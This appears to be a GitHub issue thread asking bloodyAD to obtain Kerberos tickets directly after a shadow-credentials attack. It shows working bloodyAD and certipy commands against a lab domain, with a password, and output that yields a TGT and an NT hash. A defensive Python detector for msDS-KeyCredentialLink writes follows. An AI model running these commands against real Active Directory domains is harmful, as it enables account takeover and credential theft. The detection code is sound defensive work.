
Enhancement: shadowCredentials #48

Open
0xGreen opened this issue Jun 27, 2024 · 1 comment
Labels
enhancement New feature or request

Comments


0xGreen commented Jun 27, 2024

Wondering if it is possible to enhance the shadowCredential attack to remove the use of another tool?

bloodyAD -d absolute.htb --host dc.absolute.htb -k -u m.lovegod -p 'AbsoluteLDAP2022!' add shadowCredentials winrm_user
[+] KeyCredential generated with following sha256 of RSA key: 14835400bcc0ed3199d6b17edb829ef94c31fd45379028d3267d13ec6010465c
No outfile path was provided. The certificate(s) will be stored with the filename: FNoxGjcN
[+] Saved PEM certificate at path: FNoxGjcN_cert.pem
[+] Saved PEM private key at path: FNoxGjcN_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem FNoxGjcN_cert.pem -key-pem FNoxGjcN_priv.pem absolute.htb/winrm_user FNoxGjcN.ccache

So, the attack is a success but needs another tool, PKINITtools, to get the TGT.

If it is possible to implement something like what certipy does, it would be awesome; it performs the same attack and provides the TGT. (In the past, I guess PKINITtools was required for certipy as well.)

certipy shadow auto -target dc.absolute.htb -account winrm_user -k -u [email protected] -p 'AbsoluteLDAP2022!'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7'
[*] Adding Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '65f2b4c3-f4ef-406b-6d25-e90c9d6d5bc7' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: [email protected]
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_user.ccache'
[*] Trying to retrieve NT hash for 'winrm_user'
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': 8738c7413a5da3bc1d083efc0ab06cb2
@CravateRouge (Owner)

bloodyAD is specialized in Active Directory attacks while certipy is specialized in AD certificate attacks. That's why bloodyAD only does the first part of the exploit by writing into the AD and leaves the Kerberos part to another tool specialized for it.

But if you want to add this feature feel free to add it. I would ask you not to include more dependencies than what bloodyAD already has (so no impacket dependency, only minikerberos).
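Both tool outputs above show the same two AD-side events a defender can key on: a value is added to the target account's msDS-KeyCredentialLink attribute by a different principal, and (in certipy's case) the original values are restored afterwards. The following is an added example, not code from bloodyAD, certipy or anyone in this thread: a small Python triage routine that scans Windows Security Event ID 5136 ("A directory service object was modified") records for writes to that attribute and rates them. The records are constructed, simplified events (assumption: a forwarder exports each event as a dict keyed by the event's field names); the `%%14674` / `%%14675` operation codes are the resolver strings Windows uses for "Value Added" / "Value Deleted", and the code accepts either form.

```python
"""Triage Event ID 5136 records for writes to msDS-KeyCredentialLink.

Added example for this issue; not part of bloodyAD, certipy or PKINITtools.
Input records are constructed, simplified 5136 events (assumption: one dict
per event, keyed by the event's field labels), not captured logs.
"""
from dataclasses import dataclass

KCL_ATTR = "msDS-KeyCredentialLink"
# Raw resolver codes and their rendered text, so either export style works.
VALUE_ADDED = {"%%14674", "Value Added"}
VALUE_DELETED = {"%%14675", "Value Deleted"}


@dataclass
class Finding:
    object_dn: str
    actor: str
    severity: str
    reason: str


# Constructed sample events (hypothetical; names taken from the thread's output).
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KCL_ATTR, "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": KCL_ATTR, "OperationType": "%%14675"},
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=absolute,DC=htb", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": KCL_ATTR, "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "m.lovegod",
     "ObjectDN": "CN=winrm_user,CN=Users,DC=absolute,DC=htb", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
]


def _rdn_name(dn: str) -> str:
    """Leading RDN value of a DN: 'winrm_user' from 'CN=winrm_user,CN=Users,...'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def _is_self_write(actor: str, object_dn: str) -> bool:
    """True when an account writes its own object (computer accounts end in '$')."""
    return actor.rstrip("$").lower() == _rdn_name(object_dn).lower()


def analyze(events) -> list:
    """Return one Finding per KeyCredentialLink write worth a look.

    - A write to another principal's attribute is rated high: this is the
      shape of the shadow-credential addition shown in the thread.
    - A self-write (e.g. a computer enrolling its own key) is rated low.
    - A deletion following an addition by the same actor on the same object
      is rated high: it matches the add, authenticate, restore sequence.
    """
    findings = []
    adds_seen = {}  # (object_dn, actor) -> number of additions in this batch
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("AttributeLDAPDisplayName") != KCL_ATTR:
            continue
        actor, dn, op = ev["SubjectUserName"], ev["ObjectDN"], ev["OperationType"]
        key = (dn, actor)
        if op in VALUE_ADDED:
            adds_seen[key] = adds_seen.get(key, 0) + 1
            if _is_self_write(actor, dn):
                findings.append(Finding(dn, actor, "low",
                                        "self-write of KeyCredentialLink (device enrollment pattern)"))
            else:
                findings.append(Finding(dn, actor, "high",
                                        "KeyCredentialLink written on another principal"))
        elif op in VALUE_DELETED and adds_seen.get(key):
            findings.append(Finding(dn, actor, "high",
                                    "KeyCredential removed after an earlier addition by the same actor (add-use-restore pattern)"))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.actor} -> {f.object_dn}: {f.reason}")
```

Auditing 5136 requires the "Directory Service Changes" subcategory to be enabled and a SACL on the relevant objects for the attribute; without that the events never reach the log, which is the first thing to verify before relying on this check.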

@CravateRouge CravateRouge added the enhancement New feature or request label Oct 28, 2024